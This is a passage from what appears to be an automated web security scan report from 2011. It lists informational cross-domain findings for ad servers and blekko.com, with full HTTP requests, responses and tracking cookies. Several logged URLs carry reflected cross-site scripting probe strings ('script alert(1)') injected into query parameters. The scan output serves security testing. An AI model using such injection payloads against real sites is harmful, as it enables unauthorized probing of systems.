</script><A HREF="http://ad.thewheelof.com/clk?2,13%3Bd72f99749c5d4a92%3B12de6f0528d,0%3B%3B%3B2600164045,NwQAACcrFgBNPHwAAAAAAO4WAgAAAAAAAgAMAAIAAAAAAP8AAAAECmxUJAAAAAAATZMEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAgAAAAAAjVLw5i0BAAAAAAAAADE5NTE4OGVhLTJlZGYtMTFlMC05NTQ3LTAwMzA0OGQ2ZDg5MgAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D3524532701598728%3F,http://www.ehow.com/ehow-money/blog/" target="_top"><img src=http://content.yieldmanager.edgesuite.net/atoms/d5/e0/39/58/d5e03958783f691851ab4d35100d1e63.jpg border=0></a>
...[SNIP]...

17.50. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/iframe3?NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAAAADu0dyY1T8AAABDw1rXPwAA7tHcmNU.AAAAQ8Na1z.6zorJxPnWPwAAAMpi2Ng.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD9uDYoWl2SCckUsbr8uwVGVvc7SShNIRJIwackAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,Z%3D300x250%26e%3D58661%26I%3Dhomepagee1c21%26_salt%3D3786617703%26B%3D10%26u%3Dhttp%253A%252F%252Fad.doubleclick.net%252Fadi%252Fdmd.ehow%252Fhomepagee1c21%252522__________script_____alert%281%29_____%252Fscript_____57155bc0307%253Bvid%253D0%253Bugc%253D0%253Blvl%253D4%253Bsz%253D300x250%253Btile%253D2%253Bord%253D2735259747132%253F%26r%3D1,868db51c-2ee1-11e0-85f8-003048d6d89e

The response contains the following links to other domains:

http://ad-emea.doubleclick.net/ad/N5506.150290.INVITEMEDIA/B5070033;abr=!ie4;abr=!ie5;sz=300x250;ord=1296660699?
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B0579cac1bb9e663e%3B12de70019af,0%3B%3B%3B2909974716,NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAArxkA5y0BAAAAAAAAADg2OGRiNTFjLTJlZTEtMTFlMC04NWY4LTAwMzA0OGQ2ZDg5ZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,$http://t.invitemedia.com/track_click?auctionID=1296660699193172-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F&redirectURL=;ord=1296660699?
http://ad-emea.doubleclick.net/adj/N5506.150290.INVITEMEDIA/B5070033;abr=!ie;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B0579cac1bb9e663e%3B12de70019af,0%3B%3B%3B2909974716,NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAArxkA5y0BAAAAAAAAADg2OGRiNTFjLTJlZTEtMTFlMC04NWY4LTAwMzA0OGQ2ZDg5ZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,$http://t.invitemedia.com/track_click?auctionID=1296660699193172-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F&redirectURL=;ord=1296660699?
http://ad.thewheelof.com/clk?2,13%3B0579cac1bb9e663e%3B12de70019af,0%3B%3B%3B2909974716,NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAArxkA5y0BAAAAAAAAADg2OGRiNTFjLTJlZTEtMTFlMC04NWY4LTAwMzA0OGQ2ZDg5ZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,$http://t.invitemedia.com/track_click?auctionID=1296660699193172-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F&redirectURL=http://ad-emea.doubleclick.net/jump/N5506.150290.INVITEMEDIA/B5070033;abr=!ie4;abr=!ie5;sz=300x250;ord=1296660699?
http://pixel.invitemedia.com/data_sync?partner_id=219
http://t.invitemedia.com/track_imp?partnerID=219&campID=52754&crID=73583&auctionID=1296660699193172-73583&cost=0.3590&pubICode=1502951&pub=58661&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F

Request

GET /iframe3?NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAAAADu0dyY1T8AAABDw1rXPwAA7tHcmNU.AAAAQ8Na1z.6zorJxPnWPwAAAMpi2Ng.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD9uDYoWl2SCckUsbr8uwVGVvc7SShNIRJIwackAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,Z%3D300x250%26e%3D58661%26I%3Dhomepagee1c21%26_salt%3D3786617703%26B%3D10%26u%3Dhttp%253A%252F%252Fad.doubleclick.net%252Fadi%252Fdmd.ehow%252Fhomepagee1c21%252522__________script_____alert%281%29_____%252Fscript_____57155bc0307%253Bvid%253D0%253Bugc%253D0%253Blvl%253D4%253Bsz%253D300x250%253Btile%253D2%253Bord%253D2735259747132%253F%26r%3D1,868db51c-2ee1-11e0-85f8-003048d6d89e HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepagee1c21%22%3E%3Cscript%3Ealert(1)%3C/script%3E57155bc0307;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL"; bh="b!!!#p!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!(<lEIR!#MTF!!!!(<lEIR!#MTH!!!!(<lEIR!#MTI!!!!(<lEIR!#MTJ!!!!(<lEIR!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!$<lEIR!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!(<lEIR!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"; ih="b!!!!?!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!#<lEMY!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!08r)!!!!#<lEKV!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; vuday1=_UO8P5_x-f!>[UWD3HWE; lifb=%y_Qs7i<Qa5p0/:

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:31:39 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: ad0261.2rm.ac4
Set-Cookie: ih="b!!!!?!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!08r)!!!!#<lEKV!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; path=/; expires=Fri, 01-Feb-2013 15:31:39 GMT
Set-Cookie: vuday1=_UO8P5_x-g!>[UWXYr?3; path=/; expires=Thu, 03-Feb-2011 00:00:00 GMT
Set-Cookie: lifb=B>d/Q*R:VK%y_Qs7i<Qa<!VNh; path=/; expires=Wed, 02-Feb-2011 20:10:40 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:31:39 GMT
Pragma: no-cache
Content-Length: 4468
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(7648553);}
</script><IFRAME SRC="http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B0579cac1bb9e663e%3B12de70019af,0%3B%3B%3B2909974716,NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAArxkA5y0BAAAAAAAAADg2OGRiNTFjLTJlZTEtMTFlMC04NWY4LTAwMzA0OGQ2ZDg5ZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,$http://t.invitemedia.com/track_click?auctionID=1296660699193172-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F&redirectURL=;ord=1296660699?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad-emea.doubleclick.net/adj/N5506.150290.INVITEMEDIA/B5070033;abr=!ie;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B0579cac1bb9e663e%3B12de70019af,0%3B%3B%3B2909974716,NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAArxkA5y0BAAAAAAAAADg2OGRiNTFjLTJlZTEtMTFlMC04NWY4LTAwMzA0OGQ2ZDg5ZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,$http://t.invitemedia.com/track_click?auctionID=1296660699193172-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F&redirectURL=;ord=1296660699?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.thewheelof.com/clk?2,13%3B0579cac1bb9e663e%3B12de70019af,0%3B%3B%3B2909974716,NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAArxkA5y0BAAAAAAAAADg2OGRiNTFjLTJlZTEtMTFlMC04NWY4LTAwMzA0OGQ2ZDg5ZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,$http://t.invitemedia.com/track_click?auctionID=1296660699193172-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F&redirectURL=http://ad-emea.doubleclick.net/jump/N5506.150290.INVITEMEDIA/B5070033;abr=!ie4;abr=!ie5;sz=300x250;ord=1296660699?">
<IMG SRC="http://ad-emea.doubleclick.net/ad/N5506.150290.INVITEMEDIA/B5070033;abr=!ie4;abr=!ie5;sz=300x250;ord=1296660699?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
</NOSCRIPT>
</IFRAME> <img src='http://t.invitemedia.com/track_imp?partnerID=219&campID=52754&crID=73583&auctionID=1296660699193172-73583&cost=0.3590&pubICode=1502951&pub=58661&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=219" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...

17.51. http://adadvisor.net/adscores/g.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/adscores/g.js

Issue detail

The page was loaded from a URL containing a query string:

http://adadvisor.net/adscores/g.js?sid=9202534287

The response contains the following links to other domains:

http://pixel.invitemedia.com/pixel?key=segment&returnType=js&partnerID=15&code=000&code=Y&code=&code=G000
http://pixel.invitemedia.com/pixel?key=segment&returnType=js&partnerID=196&code=0
http://segment-pixel.invitemedia.com/pixel?code=0&clientID=2064&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=0&partnerID=134&clientID=2540&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=0&partnerID=77&clientID=1769&key=segment&returnType=js

Request

GET /adscores/g.js?sid=9202534287 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=219
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:17:18 GMT
Server: Apache
P3P: policyref="http://adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 742
Connection: close
Content-Type: application/javascript

document.write( "<script type='text/javascript' src='http://pixel.invitemedia.com/pixel?key=segment&returnType=js&partnerID=196&code=0'></script><script type='text/javascript' src='http://pixel.invitemedia.com/pixel?key=segment&returnType=js&partnerID=15&code=000&code=Y&code=&code=G000'></script><script type='text/javascript' src='http://segment-pixel.invitemedia.com/pixel?pixelID=0&partnerID=77&clientID=1769&key=segment&returnType=js'></script><script type='text/javascript' src='http://segment-pixel.invitemedia.com/pixel?pixelID=0&partnerID=134&clientID=2540&key=segment&returnType=js'></script><script type='text/javascript' src='http://segment-pixel.invitemedia.com/pixel?code=0&clientID=2064&key=segment&returnType=js'></script>
...[SNIP]...

17.52. https://blekko.com/join previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blekko.com
Path:	/join

Issue detail

The page was loaded from a URL containing a query string:

https://blekko.com/join?de32a%22%3E%3Cscript%3Ealert(1)%3C/script%3E784d2feb8f0=1

The response contains the following links to other domains:

https://connect.facebook.net/en_US/all.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/66e687887728028f_jsbn.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/6f6e31bd3dcc5626_rng.js
